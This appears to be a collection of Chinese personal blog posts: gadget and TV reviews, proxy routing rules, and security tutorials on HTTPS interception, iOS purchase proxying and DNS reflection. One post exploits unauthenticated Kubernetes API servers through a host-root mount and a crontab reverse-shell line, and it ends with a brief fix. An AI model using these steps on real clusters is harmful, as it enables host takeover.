后来在网上找到了 Netflix 官方的 GitHub 项目，提供了他们的IP地理数据（nflx-geofeed），根据这个项目结合自己的代理节点，可以定制精准分流规则，解决加载卡顿问题。

一、第三方规则为何导致Netflix卡顿？

1. 规则更新滞后
   第三方规则集（如Dler cloud、ACL4SSR、lhie1等）通常采用通用域名匹配模式，规则一般不会变化，导致 Netflix 部分 IP 未走代理通道。

2. 地域匹配不准
   默认规则不会根据你的代理 IP 匹配划分，如果你的分流使用的是香港节点，但规则没匹配香港的IP就会导致速度变慢，触发区域检测机制而引发缓冲。

二、解决方案：基于nflx-geofeed的精准规则定制

Netflix官方维护的nflx-geofeed项目提供了全球各地区服务器IP的地理标签数据。我们可以根据自己的实际代理情况制定精细化规则。

步骤1：提取目标区域数据

以香港节点为例：

1. 访问nflx-geofeed仓库，下载nflx-geofeed.csv文件。
2. 使用文本工具筛选包含HK（香港）标签的IP段。例如：

   103.116.204.0/22,HK,,Netflix
   

步骤2：构建OpenClash规则文件

1. IP段规则
   根据Clash语法使用IP-CIDR创建规则。例如：

   - IP-CIDR,103.116.204.0/22,Netflix-HK,no-resolve
   

步骤3：在OpenClash中导入规则

1. 覆写规则优先执行
   进入OpenClash的覆写设置 → 规则设置，启用自定义规则并粘贴规则内容。覆写规则的优先级高于订阅规则，确保精准匹配。或者在配置管理 → 编辑规则中直接将规则添加到你正在使用的配置文件中。

四、效果验证与对比

把 IP 规则添加之后，如果你的分流代理速度给力，基本上就能做到秒加载了，你也可以直接用我做好的规则，NetflixRule，规则里包含了域名以及香港、新加坡、台湾、日本的 IP 集，有需要的可以拉取配置文件自己去维护，规则不仅适用于Android TV，也适用于其他设备。

虽然东西购买自闲鱼，但是上一代主人还是非常爱惜设备的，整个成色非常好，没有什么包浆，而且前一任主人还自费升级了一些配件，替换了导电胶的十字键，加上霍尔摇杆，让机器按键质感有了保障，日常玩一些格斗类游戏，手指也更加舒适，不容易疲劳。

Retroid Pocket3+ 的外壳材质是塑料的，但不是那种廉价塑料，因此手感很不错，有一点亲肤材质的感觉。体型上比较像小一号的 Switch，重量 235 克，比较适中，双手握持舒适，长时间游戏也不会感觉坠手。显示屏采用的是 iPhone 同规格的 4.7 英寸 LCD 屏幕，对于长期使用 iPhone 的笔者来说，显示效果上挑不出什么毛病，没有不适感。

Retroid Pocket3+ 支持 TF 卡扩容，有先进的 3.5 毫米耳机孔，底部双扬声器，而且采用的是 USB Type-C 接口，可以说在接口上是非常现代了，不过虽然是双扬声器，但实际的音效很一般，而且扬声器在底部，容易被握持遮挡，效果就又要打折扣。Retroid Pocket3+ 顶部还有MicroHDMI接口，可以输出 720P 画质到显示器上，获得更好的游戏体验。

开源掌机最重要的还是游戏体验，Retroid Pocket3+，操作系统是基于 Android 11 定制的，做了横版操作的优化，可以通过按键和触碰进行操作，几乎没有学习成本，很容易上手。Retroid Pocket3+ 也做了一个自己的掌机桌面（前端），进入之后会展示所有的模拟器，界面也非常的美观，只要安装了对应的模拟器，导入游戏后，就可以开始进行同年的回忆了。

除了 Retroid Pocket3+ 自带的掌机桌面，还有第三方的游戏前端桌面，在开源掌机圈比较有名的有大水杯、天马、ES-DE等等，这些游戏桌面也有很多大神做好了游戏整合包和详细的教程，只要按照教程操作就可以轻松配置好模拟器，并且获得海量的游戏，需要的同学可以自行去 B 站找到相关的教程视频。开源掌机的乐趣之一也在于此，不停的折腾界面和内容，就像中年男人折腾 NAS 一样。

本人拿到掌机这段时间已经重温了不少儿时的经典游戏，像重装机兵、炎龙骑士团、仙剑奇侠传、超级机器人大战，对我来说这台开源掌机我个人是十分满意，而且现在的开源掌机圈也是非常的热闹，有非常多的新机器源源不断，期待新人的加入，不过还是要理性购物避免被割韭菜，毕竟开源掌机的硬件性能都很一般，售价相对虚高，还是要根据自己的需求理性消费。

自从家里有孩子之后，打扫家里卫生的时间和精力就越来越少，加上家中的「领导」对环境卫生有苛刻的要求，之前的米家扫拖机器人1c已经不能满足她的要求了，因此购买一台扫拖一体机器人保持家庭卫生就提上了议程。经过多方对比之后最终选择了米家全能扫拖机器人1S，在使用了近1个月之后，可以聊聊它究竟如何了。

米家全能扫拖机器人1S的配件很简单，除了常规的刷头、拖布头之外，还赠送了一瓶清洁剂，根据操作说明进行安装并连接上米家App后，就可以使用了。如果你像我一样已经是米家的长期用户了，那么整个过程几乎没有任何难度，这也是米家一贯的作风了，简单易用。

经过这一段时间的使用，我觉得它的优缺点都很明显，先从优点开始说起。

首先要说的就是清洁能力，4000Pa的吸力加上旋转式的拖头，在扫拖清洁性上得到了家里「领导」的认可，除了一些清扫死角和极其顽固的污渍之外，可以将我家里90%的区域打扫干净，而且拖地后遗留的水痕也较轻，不会影响瓷砖和地板的观感，因此清洁能力可以给到90分。

第二优点就是它的避障建图能力，我在它第一次扫拖地时候全程跟踪，除了因为高度问题它无法进入电视柜底部，没有发生过一次「愚蠢碰撞」，精准的避开了家里的宠物🐈‍和乱窜的小孩，可见双线激光探测加AI视觉识别避障还是有非常好的效果。一次完整扫拖后，它就准确的完成了建图，并且针对我家里的区域进行了非常准确的识别，前任米家扫拖机器人1c比需要多次清扫才能完成建图，而且因为依靠的是纯视觉系统，经常会在家里乱撞。

其次就是它强大的智能化功能，依托米家生态和它精准的建图，我可以完美的利用小爱同学对它进行智能化的控制。例如当我们一家出门玩耍的时候，我会让它开启强力清洁加高水位模式，给家里来一次深度打扫，既可以规避清扫的噪音，又能合理利用时间。依托它的建图，我也可以根据需求让它对单独区域进行清扫，比如小孩子在餐厅吃完饭之后，单独清扫餐厅瓷砖的污渍；洗完澡之后，单独清扫浴室的头发等等。

最后一个优点就是它的体积和性价比，米家作为价格屠夫，在同等价位同等功能上几乎没有对手，定位相似的石头G10s和追觅s10，在功能上和米家全能扫拖机器人1s互有胜负，但是价格上都贵出不少。另外，因为我需要把它摆放在沙发和阳台墙中间，它「高瘦」的体积可以帮我节约更多的空间，配合它的高度，顶部还能临时作为放置物品的空间，这一点上偏「矮胖」的石头G10s在我的使用场景上就稍逊一筹。

同样米家全能扫拖机器人1s也有几个缺点，不得不提。

第一个就是它自带的语音操控功能，设计上是为了让你可以通过语音控制它对你站立的区域进行打扫，或者语音控制它的工作状态。但因为我把它摆放在客厅，它经常会和我客厅的小爱音箱冲突，有时候我在呼叫音箱的时候它莫名其妙就出仓开始工作，即使我开启了小爱同学的就近唤醒，但因为位置上它过于靠近小爱音箱，还是会产生误操作，最终不得已我关闭机器人上的语音控制功能。

第二个就是它标配的是胶毛混合的刷头，这种类型的刷头非常容易缠绕毛发，作为一个拥有长发「领导」和宠物🐈‍的家庭，每次清理刷头体验都不好，因此强烈建议米家在后续的产品上改用纯硅胶的刷头，虽然这会影响一点它的集尘效果，但是也可以明显改善缠绕毛发的情况，相较之下我还是愿意选择牺牲集尘效果换来清理刷头的轻松。好在还有补救方案，你可以选择购买追觅s10的硅胶刷头和刷头罩进行更换，一次更换永久收益，不过目前追觅s10的硅胶刷头官方都缺货了，不知道是不是大家都去购买的原因。

至于其他方面，比如基站的清扫换水、配件的更换、日常的养护和其他扫拖一体机器人并没有本质上的区别，都处在一个水平线上，没有拉开明显的差距。

如果你和我一样，需要一台省心省力、性价比高、能自动清洗与烘干、未来可拓展自动上下水，且具备良好的智能家居生活新体验的扫拖机器人，那么米家全能扫拖机器人1S，是个不错的选择。

幸好索尼今年除了发布 BRAVIA XR 新系列电视外， 还重新设计了遥控器且国行和海外版的区别仅仅是删除了一些海外流媒体按键，因为此前已经将我的国行 A80J 更换了海外主板，详情见国行 Sony 电视更换主板最详教程，于是我果断买了海外版的新款遥控器搭配我的电视使用。

购买渠道

我是在shopjimmy上购买的 TX-800U，到手大概花了不到 40 刀，送到笔者手上大概花了不到 1 个月时间，现在万能的淘宝上已经有华强北产品了，大概不到 80 RMB，有需求的可以直接华强北买即可，不必再从海外采购，浪费时间和金钱。

需要注意的是，海外款的遥控器型号有两种，分别是 TX-800U 和 TX-900U，对应 Sony Mini-LED 和 Oled 两个系列的电视，两款遥控器还是有些区别的，TX-900U 材质上是金属拉丝、有背光按键、支持蜂鸣查找且其中一个流媒体按键是 Bravia Core 没有 Youtube 按键。具体购买那款，可以根据自己的需求来选择。

使用体验

第一次使用，需要先配对遥控器。首先在电视的设置主页中，找到遥控器配对选项，按照电视机显示步骤配对，长按遥控器上语音和音量键按键，待遥控器指示灯闪烁之后松开手，等到电视显示配对完成即可。配对完成后才能正常使用语音助手按键。

配对完成后，就可以正常使用遥控器上的所有功能了，因为我的电视已经更换了海外主板，所有流媒体按键都可以正常唤醒对应的软件，语音功能也正常。新的遥控器的按键反馈也远远强于老款，不同按键的大小和分布区域也更方便用户进行操作，在使用了不到半天我已经可以很熟练的盲操了。老款的遥控器已经可以丢到抽屉里吃灰了。

其他事项

因为我仅针对 A80J 进行了兼容性测试，如果你使用的是更老一些的 Sony 电视，这里不保证能完全兼容，但是看到Chiphell上提到，16年之后的电视都可以使用，有需求的可以购买国内款（TX-800X/900X）尝试一下。

前因

之所以会有这次更换主板的想法，主要原因如下：

1. 电视盒子如果没有完整的「杜比全家桶」就浪费了电视的效果，且盒子和电视部分场景下的切换使用，偶尔让人觉得抓狂；
2. 国行的电视系统没有完整的生态。虽然也有诸如当贝市场、沙发管家、Emoton store 这些第三方市场可供使用，但是生态是割裂的，应用内容也远远不够
3. UI 界面无法接受。充斥各种广告，无效信息和强制安装应用的瀑布式界面，对于我这样的信息洁癖来说，实在无法忍受
4. 重要服务的缺失。Chromecast、Homekit、Airplay、GMS服务的缺失，让电视的功能大打折扣，虽然可以用其他方案替代，效果始终不理想
5. 系统、功能、安全补丁更新缓慢。因为定制的原因，导致一些与Google TV同步的系统更新缓慢，总是要缺失很多本来属于用户的功能更新

基于这些原因，我开始了更换主板之旅，可能有人会问，为什么不买一个电视盒子，比如 Apple TV？因为电视本身的 Google TV 系统就可以带来媲美甚至超越电视盒子的体验了。

更换流程

购买主板

首先我们需要购买海外的电视主板，大家可以在下面几家美国的电子零件供应商购买主板：

• tvpartstoday
• tvpartsguy
• shopjimmy

我最后选择了 tvpartstoday 购买主板，这是一家来印第安纳州的电子零件供应商，除了主板之外还包括屏幕、驱动、背板、电源等等。你可以直接搜索你的电视型号，然后购买对应的主板，比如我的电视是型号是 XR-77A80J，直接搜索对应型号即可。

tvpartstoday 的购买流程并不复杂，注册账号并补充相关信息就好，稍微有一点海淘经验即可完成，我们可以使用 PayPal 或者信用卡进行结算，购买完成后就可以耐心的等待商家将主板寄给你。

准备工具

主板到货之后，tvpartstoday 还会附赠一个简易的说明书，根据他的提醒我们最好提前准备一个 U 盘，并提前在 Sony 的官网中下载固件，在更换完主板后进行手动更新。

我在更换主板的时候，成功一次点亮，并没有手动升级固件，而是配置完电视之后在线更新了系统，但是为了以防万一，这里还是推荐大家预先下载好自己电视对应的海外固件

除此之外，因为海外的主板相比国行主板多两个音频口，具体的位置可能根据不同的型号略有不同，因此我们还需要准备一个电钻进行打孔，孔径大概是7MM的大小，当然为了保证拆卸的顺利我们也可以提前准备好金属卡尺或者拆机片拆卸电视后盖。

当然如果你的动手能力较差或者和我一样电视尺寸过大，无法一个人完成拆卸的话，那么我建议你和我一样选择直接与本地的 Sony 售后人员联系，让 Sony 的工程师上门帮你进行更换，这样能最大程度的减少悲剧的发生，并且你的设备能得到最大程度的保护，当然 Sony 是需要收取一定的人工费用的，这里你可以对照服务费用)综合考虑是否需要这样的服务。

总结下来我们需要提前准备好：

1. 足够容量的 U盘

2. 对应型号的海外固件

3. 7MM 钻头的电钻

4. 拆机片

5. 与本地 Sony 售后工程师沟通

注意事项

这里再补充一些更换过程中需要注意的事项以及事后我获得的一些信息提前告知一下大家，方便小伙伴们做最后的决策，是否有一些自己不能接受的事情。

保修和售后

作者坐标武汉，有非常方便的 Sony 售后，并且上门的工程师也非常的专业靠谱，如果你所在的区域没有比较健全的服务，那么大概率需要自己动手更换了。我的主板在付费更换完毕后，Sony 的工程师明确表示并不会影响我的电视的一年的整机保修和三年主要部件保修。师傅只是叮嘱我保留原主板，如果出现问题可以联系他们再次进行维修更换，至于不同地区是否有不同的政策，作者不得而知，但是无论如何，更换下来的主板一定要好好保存。

海外主板的来源

目前来看，购买的海外主板，有比较大的概率不属于 Sony 工厂原件的而是拆机件，因此 Sony 的工程师是无法将你设备原有的序列号录入到海外主板中的，只有工厂模式主板可以将序列号也就是你机身号码进行录入。上门的 Sony 工程师在进行这个操作的时候发现主板已经有了序列号也有了主板型号，但这并不影响主板本身的使用和功能，大家可以不必担心。

有线电视功能可能有影响

因为是海外主板，因此有线电视的功能会与国内的有线电视传输协议上可能存在一定的偏差，如果你有使用有线电视的需求，那么需要慎重考虑一下换主板是否有必要了。这里作者因为没有亲自测试过是否有影响，但是网络上有反馈可能会出现无法使用的情况，因此还是提醒一下大家风险，但要注意的是运营商的 IPTV 电视服务是不受任何影响的！

部分国行电视功能丧失

更换完主板后，有一些专门针对国行电视的功能就会彻底消失了，比如内置的电视应用商城、电视自带优惠活动的兑换、针对国内用户的电视会员优惠、国内流媒体的一些会员优惠。除此之外，遥控器上的流媒体快捷键也会提示找不到 App，因为内置的腾讯视频在海外系统不是内置安装的。

激活电视的网络需求

更换了主板后，电视的部分功能需要有流畅的网络方可使用，在刚开始激活电视时，因为 NTP 服务器的原因，WIFI 可能存在实际已连上但是不能联网的情况，这里进入系统设置里手动修改时间后即可解决，也可以后续通过进入开发者模式后，使用 ADB 命令修改 NTP 服务器同步地址来解决

如果上述的一些事项你看过之后和作者一样都能接受，那么你就可以大胆的更换主板了。

更换激活

如果你是自己更换，在断电之后，我们首先需要拆卸电视背板，不同的电视型号的背板大同小异。机身和背板主要通过卡扣连接，在卸掉固定背板的螺丝之后，需要使用拆机片或者金属卡尺慢撬开连接的卡口，这一步需要小心一点，避免撬断卡扣。成功打开背板之后，整个机身大概是这样

卸掉固定主板的螺丝，并小心拆卸掉上面的排线，取下主板即可，这里别忘了对主板的挡板进行开口，前面提到过，海外的主板有多的音频接口。之后就是重新插上排线，并且固定好主板，大家也可以去B站和油管上搜索一下拆解更换视频，也许能找到对应的电视型号，跟着视频拆解会更有信心一些。

更换完毕后，别着急立刻装好背板，先通电开机，看看是否能正常点亮，当我们能看到下面的画面的时候，证明一切顺利，可以放心的还原电视了！

我们可以选择使用 Google TV 或者 Base TV 模式，这里后续的设置可以根据你的实际使用情况来选择，相信能完成前面所有工作的小伙伴，后续设置上应该不会有太多困难了，唯一要提的是初次使用和激活 HomeKit 和 AirPlay2 功能时，全过程需要联网激活，你需要一个可用的海外代理，否则会一直提示 HomeKit 连接密码错误。

当你正常接入 Homekit 之后，你就可以通过 Siri 控制电视的开关，包括使用 iPhone 虚拟遥控器控制电视了。

最后一步，我们还需要把校色数据导入到主板中，我们要在工厂模式（ service mode ）下，选择显示面板设定（ Panel/PQ ）——色彩参数传输（ WB/Mura/CUC data transfer ）——勾选三个参数——选择 T-con->SoC 然后执行（ Start ）。这里执行完之后，不会有界面上的反馈，我们需要直接断电让配置生效。这里是 Sony 的工程师告知我的，具体原因不详，既然工程师这么说了，照做即可。SONY 电视出厂是校色过的，色彩文件一式两份主板驱动版上各一份，可以导入导出至对方，只要不是驱动板和主板一起损坏，文件不会丢，所以至少要保证一个板子没换过才能保留色彩文件。

至于如何进入工厂模式（ service mode ），有两种方式：

1. 首先激活电视的开发者模式，激活方式和所有 Android 设备，在设备信息中连续点击版本号即可，之后进入开发者模式选项，开启 ADB 调试，然后就可以在同一个局域网中使用其他设备连接你的电视了。输入 ADB 命令 am start -a com.sony.dtv.intent.action.SELF_DIAG_MODE 即可进入工厂模式。

2. 通过遥控器进入，自带的原厂遥控器是不可以的，我们需要购买工程遥控器，型号为 TX210C，可以在淘宝上自行购买。使用工程遥控器，在电视关机的情况下，依次按下⌈5⌋【音量减】【开机】，即可进入工厂模式。

到此，我们所有工作就做完了，下面就可以真正的完整的享受 Sony 电视的全部功能了！

系统体验

更换主板完成好配置之后，我们就可以体验 Google TV 了，界面上再也没有国内冗杂烦人的广告，界面的操作逻辑也更合理。

如果你的 IP 地址和你的 Google 账号区域相对应，电视也会给你推荐相应的内容，我们也可以自己管理在主界面上需要展示的流媒体推荐内容，主流的 Disney +、Apple TV、Prime Video、Hulu 都是支持的，但是缺失了 Netflix，希望 Google 能赶紧补全。

当然最重要的收益就是，我们可以获得完整的 Google 生态，我们可以同步我们的 Google 生态下所有的服务，比如我是 YouTube Premium 的会员，我可以在电视上享受完整的服务内容，不再需要使用第三方的 YouTube 应用，我可以方便的通过 Web 端端 Google Play Store 下载和管理我的电视应用。

我们也可以方便的同步我账号的密码，不再需要用遥控器傻傻的进行输入。

同样也可以用上更加智能，且与生态结合的更紧密的 Google Assistant，你可以用它结合 Google 强大的搜索能力，得到几乎最精准的内容，而且支持中文！

我们可以彻底告别基于 Android TV 的电视盒子，因为盒子有的功能，电视全部都可以实现，而且 Sony 电视对杜比音效、杜比全景声、杜比视界等声音特效的支持也远强于普通的电视盒子，至于其他的功能，这里就不再做赘述，大家可以自己去慢慢发觉，就不在此展开了。

瑕疵&建议

文章的最后其实还有两个谈不上问题的小瑕疵，希望之后能够解决，第一个就是，Google TV 的 UI 界面的流畅感远远比不上 Apple TV 4k，后者在遥控器反应、系统流畅度、UI 动画上依旧是最高水平，Android 生态还有非常大的追赶空间。如果你觉得界面有卡顿感，我建议你和我一样在开发者模式中，把所有的动画时间都设置为 x2 能够极大的改善体验。

另外一个瑕疵就是国行 Sony 的遥控器实在是太太太难用了。很难想象这是 Sony 设计出来的产品，没有背光，按键过于小，导致无法盲操，键位的设计也极度的不合理。这点罗永浩也在微博上吐槽过了，好在 Sony 自己也发现了问题，在新的 K 系列产品中给出了新款遥控器，可以说是全方位的升级了遥控体验，建议大家有条件可以等一等买海外的版本。

那么更换主板这件事适合那些人群呢？首先需要具有爱折腾的心且能从中获得快乐的人，其次就是不想外接一个电视盒子，即使电视盒子基本上能解决80%的问题，然后还得有一些完美主义癖好，想要不断去完善自己的生活质量，最后就是具备一定的动手能力和耐心，如果上述条件你都满足，那么立刻动手吧，整个的成本在不依赖外人帮助的情况下和购买一个电视盒子的花费相差无几。

尾巴

因为疫情和等待配件的原因，从获得主板到真正完成更换再到完成所有的设置，踩过了大大小小不少坑。比如最开始我这款电视在 tvpartstoday 并没有货，等了很久才有我这个型号的主板，再到朋友从国外帮我人肉带回来主板，到它完成了整个的隔离周期后，才把主板交到我手上，在疫情肆虐的今天，过去成熟的海淘也变得困难重重。但是在付出了大量的时间和精力之后，收获的回报也更让人感到满足，或许这就是折腾的快乐吧。

最后感谢整个过程中所有帮助到我的人：

• 我的好朋友Timon Peng
• V2EX上的朋友
• Sony 工程师的尽职尽责的解答

感谢🙏

Android 7.0 之后 Google 默认不信任 User 域下的证书，也就是自行导入证书的方式去抓 HTTPS 包的方法已经不管用了，再加上现在大部分 App 都使用了 SSL Pinning，因此抓包的难度也比之前大了不少。此时再想抓 HTTPS 的流量就要用别的方法了。

如果你够强直接逆向了 App，然后在应用的证书信任的配置文件里添加上你的证书，那么你还是可以抓取这个 App 的流量的，但是这种方法工作量太大，针对不同的应用你还需要一个个逆向文件，成本实在太高。这里讲的方法还是相对省事省时间的方法。通过获取手机 Root 权限，将 BurpSuite 的证书导入系统域中，这样系统就会信任你的证书，达到抓取所有 App 流量的目的了。

方法

在进行之前确保你有以下的条件：

1. 一部获取了 Root 权限的手机
2. 电脑有 OpenSSL 环境

如果你有了上面的条件，下面开始开始操作

1. 从 Brupsuit 中导出证书文件 cacert.der

2. 将 Der 的证书转换为 PEM 格式 openssl x509 -in cacert.der -inform DER -out cacert.pem -outform PEM

3. 获取证书的 hash openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1 记住输出的hash，例如 '9a5ba575'

4. 将证书内容输出到新文件中，文件名称格式为为刚刚输出的 hash + .0， cat cacert.pem > 9a5ba575.0

5. 将证书内容格式化后追加到刚刚生成的文件中，openssl x509 -inform PEM -text -in cacert.pem -out /dev/null >> 9a5ba575.0

6. 将文件传入手机中adb push 9a5ba575.0 /system/etc/security/cacerts/

7. 使用 ADB 连接手机，执行 adb shell 切换到 Root 权限，然后挂载/system, mount -o rw,remount /system，给你的证书文件加上权限 chmod 644 /system/etc/security/cacerts/9a5ba575.0

8. 重启手机，查看证书是否安装完成

重启手机之后，可以去你的证书目录中查看下证书是否正常导入了，下面是正常的的状态。

尾声

除了导入证书，也有其他的方法来解决这个问题，比如通过 Xposed 插件的方法来实现抓包
如何使用Xposed+JustTrustMe来突破SSL Pinning
或者通过虚拟环境的的方式来抓包，比如使用 HttpCanary，好处是不需要 Root 你的手机
手机抓包+注入黑科技HttpCanary——最强大的Android抓包注入工具
你可以根据自己的实际情况来选择方案。

Kubernetes 的服务在正常启动后会开启两个端口：

1. Localhost Port （默认8080）
2. Secure Port （默认6443）

这两个端口都是提供 Api Server 服务的，一个可以直接通过 Web 访问，另一个可以通过 kubectl 客户端进行调用。

正常情况下 Api Server 是有权限控制的，分三种：

1. Authentication
2. Authorization
3. AdmissionControl

如果运维人员没有合理的配置验证和权限，那么攻击者就可以通过这两个接口去获取容器的权限，甚至通过创建自定义的容器去获取宿主机的权限。

0x01 漏洞利用

利用方式按严重程度来说分两种，一种是直接通过利用 kubectl 客户端调用 Secure Port 接口去控制已经创建好的容器。另外一种利用方法就是通过创建一个自定义的容器将系统根目录的文件挂在到/mnt目录，通过修改/mnt/etc/crontab 来影响宿主机的 crontab，获取一个反弹 Shell 拿到宿主机的权限。先说第一种方式。

首先，通过下面命令，去发现已经存在的容器

kubectl -s ip:port  get pods

然后直接连接这个容器获取 Shell。

kubectl -s ip:port  --namespace=default exec -it dockername bash

这样就达到了控制容器的目的，但是容器的权限本身是不稳定的，如果宿主机本身的内核有问题的话，可以利用脏牛漏洞进行提权，获取宿主机的权限。具体可以参考：

PoC for Dirty COW (CVE-2016-5195)
DDirtycow-docker-vdso

第二种方式就比较厉害了，利用成功后造成的危害也最大。

首先我们根据官方的规范新建一个标准文件 myapp.yaml ,当然也可以使用 json 格式的。

apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  containers:
  - image: nginx
    name: container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

其中的 image 可以更换，最好使用基础镜像。

然后我们可以通过两种方式提交我们创建容器的请求，一种是通过他的 Web 页面（也就是默认的8080端口）

另外我们也可以通过他的另外的接口，通过 kubectl 客户端进行任务的提交。

kubectl -s  ip:port create -f yourfile

这里如果出现Error from server (NotFound): the server could not find the requested resource报错，可能是因为你的 kubectl 客户端和 kubernetes 的 server 端版本不相同导致的，一定要确保版本相同。

提交成功后，我们用之前命令获取容器的 bash，然后向容器的 /mnt/etc/crontab 写入反弹 shell 的定时任务，因为创建容器时把宿主机的根目录挂载到了容器的/mnt 目录下，所以可以直接影响到宿主机的 crontab。

echo -e "* * * * * root bash -i >& /dev/tcp/ip/port 0>&1\n" >> /mnt/etc/crontab

接下来就是见证奇迹的时刻，耐心的等待你就能拿到 Shell 了，验证之后可以确认是宿主机的权限，而不是容器的权限

0x01 漏洞修复

在使用 kubernetes 的时候我们一定要进行身份的校验，K8S 的 APi 其实有非常严格的认证和授权

最简单的是在 Authentication 增加静态的 password，或者 token，可以的话关闭 Web 端口的服务，保持最小化原则，避免安全风险的产生，可以参考 官方文档

iOS针对IAP有一个保护机制，如果使用了全局代理的方式，iOS检查到之后为了保障交易的安全性，将会拒绝IAP流程，所以是无法抓取交易数据的，以豆瓣阅读为例，未开启代理时，可以正常的进入IAP充值界面，开启代理后则会报错：

但是如果使用的动态代理的模式，可以绕过iOS的检查机制，下面就介绍下具体方法（PS：在这之前，默认你已经按之前的方法将证书倒入了iPhone设备中，教程地址：移动端安全修炼（一））。
这里需要补充一点，新版的iOS在信任证书环节需要新增一个信任，否则无法完全抓取HTTPS数据，具体位置在「设置」—「关于手机」—「信任证书设置」，如图所示：

方法

先准备一个PAC文件（PAC，一个自动代理配置脚本，包含了很多使用 JavaScript 编写的规则，它能够决定网络流量走默认通道还是代理服务器通道，控制的流量类型包括：HTTP、HTTPS 和 FTP）。内容很简单：

function FindProxyForURL(url, host)
{
    if(shExpMatch(url,"*.douban.com/*")){
return "PROXY 192.168.1.134:8088";
    }
}

这个PAC的意思是域名douban.com使用192.168.1.134:8088进行代理，保存文件为test.pac之后，需要开启一个Web服务器提供这个PAC文件的地址，这里使用Python默认的模块来开一个简单的HTTP服务，到你保存的PAC路径使用如下命令：sudo python -m SimpleHTTPServer 9527 ，这样在你自己本机的IP地址下，就启动了一个Web服务，之后将iOS的WI-FI网络配置你的代理PAC如下：

开启你的抓包软件，抓取你设定好的IP和端口的数据，打开豆瓣阅读进行正常的充值业务，发现不在报错而且可以抓取IAP支付流程的包了，这样就可做交易数据的安全分析了，设定和抓包详情如下：

尾巴

使用该方法抓包，还是需要设备信任抓包工具的证书不管是Charles还是Burp Suite，基于HTTPS的流量抓包，证书是必备的，只不过使用动态代理的方式绕过了检查机制从而获取了想要的数据。

前阵子业务上碰到了DDOS攻击，正好是DNS反射型的，之前只是听过，没自己处理过，仔细学习了一番之后做点记录。

简介

DNS反射放大攻击主要是利用DNS回复包比请求包大的特点，放大流量，伪造请求包的源IP地址为受害者IP，将应答包的流量引入受害的服务器。

简单对比下正常的DNS查询和攻击者的攻击方式：

正常DNS查询：
源IP地址 -----DNS查询----> DNS服务器 -----DNS回复包----> 源IP地址

DNS攻击：
伪造IP地址 -----DNS查询----> DNS服务器 -----DNS回复包----> 伪造的IP地址（攻击目标）

分析

从服务器上抓了一些攻击包，根据这些数据包可以来看看这种攻击都是什么特点。

• 全部是大量的DNS响应请求（Response请求）

• 通常里面包含一些不存在或者生僻的域名，经过循环查询从而放大DNS流量

• 会将将 OPT RR 字段中的 UDP 报文大小设置为很大的值（如 4096）

通过这样放大了攻击流量。发送的 DNS 查询请求数据包大小一般为 60 字节左右，而查询返回结果的数据包大小通常为 3000 字节以上，因此，使用该方式进行放大攻击能够达到 50 倍以上的放大效果。

• 大量的流量都来自正常的DNS服务器

攻击者通过伪造IP向正常的DNS服务器发送这些恶意的查询请求，将流量引入受害者的服务器，受害者查不到攻击者的真实IP

解决方案

1. 如果没有必要可以关闭DNS服务（废话么不是
2. 如果有DNS服务，做好响应限制，DNS服务不应对互联网上的域名解析服务，而只响公司内部网络DNS解析请求
3. 限制DNS响应数据包大小的阈值，直接丢弃超大的响应数据包

尾巴

希望以后不要碰上这种攻击，双休还得加班修复。以上全部！

移动端安全和Web差别并不大，也是分为服务端和客户端，只不过客户端换成了一个App，服务端和Web基本一致。因此挖掘服务端端漏洞和Web没有太大差别。重点在于如何挖掘客户端端漏洞，涉及反编译，代码审计，等等。

如果想要开始漏洞挖掘，最基本的还是要一个真实环境，一搬有两种方法，虚拟机和实体机，之前尝试过用虚拟机安装但是坑比较多，暂时放弃了，因为我手上有一台Android和iOS设备，因此暂时使用实体机器进行测试。开始主要针对服务端，那么就要涉及抓包，这里讲下怎么抓包。

这里只讲一种方法，抓包的方式很多，后面也许会补充，我只讲自己用到的。

需要工具：

1. 电脑一台
2. burpsuite

查看下自己电脑的IP，确保手机和电脑在同一个网络环境下。

然后修改手机的Wi-Fi设置，将代理设置为该IP（以Android和ios为例）：

这样http的流量就会经过你的电脑，接下来需要配置burpsuite

这样就可以拦截http流量，但是大部分的流量是https的还需要倒入证书，使用手机的浏览器访问你的代理ip＋端口，可以看到burpsutie的界面，点击CA Certificate证书，可以把证书下载，然后倒入手机中即可

这样可以看到流量http和https都经过你的电脑了，就可以像测试web一样进行抓包测试了。

以上是最简单的抓包配置。从这基本上就可以开始进行简单的测试，新世界的大门就打开了。